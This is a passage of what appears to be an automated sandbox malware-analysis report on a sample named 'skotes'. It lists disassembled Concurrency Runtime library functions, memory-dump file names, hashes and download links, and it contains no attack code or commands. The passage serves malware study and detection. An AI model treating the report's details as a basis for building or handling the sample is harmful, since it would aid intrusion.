• Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 006BA069
  • Part of subcall function 006BB560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 006BB5AF
• Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 006BA07F
• Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 006BA0CB
  • Part of subcall function 006BAB41: List.LIBCONCRT ref: 006BAB77
• Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 006BA0DB
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
• String ID:
• API String ID: 932774601-0
• Opcode ID: 14608d120ec2dd5e767a2065d38bd2d8848beba15e56b5ae6ae9db2ab8955289
• Instruction ID: cd5fff8e272a6af1218e7904dd7d316692aeacf3323846af67e97e942aadca75
• Opcode Fuzzy Hash: 14608d120ec2dd5e767a2065d38bd2d8848beba15e56b5ae6ae9db2ab8955289
• Instruction Fuzzy Hash: 7B21AC72500B159FCB24EFA5C8908EBF3F6FF48700B00495EE842A7651DB70A941CBA6
APIs
• ListArray.LIBCONCRT ref: 006B4893
• ListArray.LIBCONCRT ref: 006B48A5
  • Part of subcall function 006B5555: _InternalDeleteHelper.LIBCONCRT ref: 006B5564
• ListArray.LIBCONCRT ref: 006B48AF
• _InternalDeleteHelper.LIBCONCRT ref: 006B48C8
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: ArrayList$DeleteHelperInternal
• String ID:
• API String ID: 3844194624-0
• Opcode ID: b9d5d80149ebec00107e8178eb4ec087349bcf1ac9d6f3ff198130eefa9e1ccf
• Instruction ID: 5008fed6c2d0fd464b997189de0098e7b227d06c1104c37840bab14ca43a75c8
• Opcode Fuzzy Hash: b9d5d80149ebec00107e8178eb4ec087349bcf1ac9d6f3ff198130eefa9e1ccf
• Instruction Fuzzy Hash: 2B01D6B2600961AFCE657B64D886EEDB76BBF85710301012DF50557A53CF20ECA197A4
APIs
• ListArray.LIBCONCRT ref: 006BEE6A
• ListArray.LIBCONCRT ref: 006BEE7C
  • Part of subcall function 006BEF29: _InternalDeleteHelper.LIBCONCRT ref: 006BEF3B
• ListArray.LIBCONCRT ref: 006BEE86
• _InternalDeleteHelper.LIBCONCRT ref: 006BEE9F
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3844194624-0
                                                                                                                                                                                                                                          • Opcode ID: adad2121de72225fe6dc5328e778da5fec9ee81828c073a32b711f1e8236d055
                                                                                                                                                                                                                                          • Instruction ID: bd401d72b935bced946cd244aeb27090c2af8658159286ed9d2bd78a56833f5d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adad2121de72225fe6dc5328e778da5fec9ee81828c073a32b711f1e8236d055
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4001D6B1300521AFCB657B65C8C2DFEBB6BFF85710701002DF40557A52CB21EC929BA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006BD0C5
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006BD0D7
                                                                                                                                                                                                                                            • Part of subcall function 006BC6B2: _InternalDeleteHelper.LIBCONCRT ref: 006BC6C4
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006BD0E1
                                                                                                                                                                                                                                          • _InternalDeleteHelper.LIBCONCRT ref: 006BD0FA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3844194624-0
                                                                                                                                                                                                                                          • Opcode ID: 7870a40c021308574c836eceecda082d319563c081ff547dff4246e1322d0f55
• Instruction ID: f9b791c05b0fd394e21de47cd69fa1080262586a2668d672777dc711dabe2a37
• Opcode Fuzzy Hash: 7870a40c021308574c836eceecda082d319563c081ff547dff4246e1322d0f55
• Instruction Fuzzy Hash: 2801FEB1700511BFCA657B64C9C6DEDB76BFF45711701101DF4015BA52DF20DC9297A4
APIs
• Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006C33DB
• Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 006C33EF
• Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 006C3407
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006C341F
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
• String ID:
• API String ID: 78362717-0
• Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
• Instruction ID: 4ea8f7a2edf0eb4553534135f1ebfe9a1fe26084ef659da0fb3d562c41e8bab2
• Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
